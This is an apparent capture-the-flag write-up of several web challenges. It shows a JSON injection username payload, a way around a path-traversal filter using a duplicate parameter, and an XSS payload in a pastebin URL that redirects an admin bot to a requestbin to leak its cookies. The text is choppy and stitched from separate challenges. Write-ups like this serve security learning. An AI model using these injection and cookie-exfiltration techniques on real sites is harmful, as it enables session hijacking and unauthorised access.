So, for this challenge, we need to set the "member" parameter in the json to something that is not 0, ideally 1. idk all the techincal stuff but i just tried to inject stuff into the json Since we still need valid json for it to work, I first gave the name a junk value, and then closed the quote, created a new member parameter, gave it the value 1, and then finally created a random parameter with a junk value to make sure it was valid json. Final payload (just use this as a username) hi","member":1,"hi":"hi
which gets you the flag: flag{t0ny_5uck5_47_w3b_l0l}
Flag: flag{1_c4nt_f1nd_4_g00d_p4nd4_pun}
Web
Static Static Hosting
Just pasted xss filter bypasses until one gave an alert('xss'), then refined it to send us the cookie.
If the first char is not alphanumeric, remove it, and keep removing until an alphanumeric char is found
If the string "../" (and basically all variants, url encoding etc.) are present, replace them with nothing, and keep replacing until none are left.
We can bypass this by having a decoy path parameter as something random (as long as its not an actual dir i think its fine), and then having an "&&path=" to add another path variable, which is unfiltered.
That looks kinda like base64, and if you base64 decode the thing after https://static-pastebin.2020.redpwnc.tf/paste/# you'll find it decodes to the content of the pastebin! This allows us to easily create pastebin messages.
There's also an admin bot submit form, where we can submit a url, and the admin bot will visit it.
Rak found that the xss ><img src='' onerror="javascript code"> worked.
First, we can try a simple redirect. ><img src='' onerror="document.location='requestbinurl'">. I set up a requestbin for this purpose. Remember: we base64 encode the payload, and append it to the major part of the url.
, as a sample, works, sending a request to our requestbin. Let's exfiltrate some information. We can use GET parameters to exfiltrate data.
This would redirect the admin to our requestbin, sending the cookies as the "thing" parameter. Base64 encoding and submitting this as a url, a request on the requestbin pops up with the parameters ?thing=flag=flag{54n1t1z4t10n_k1nd4_h4rd}, giving us the flag,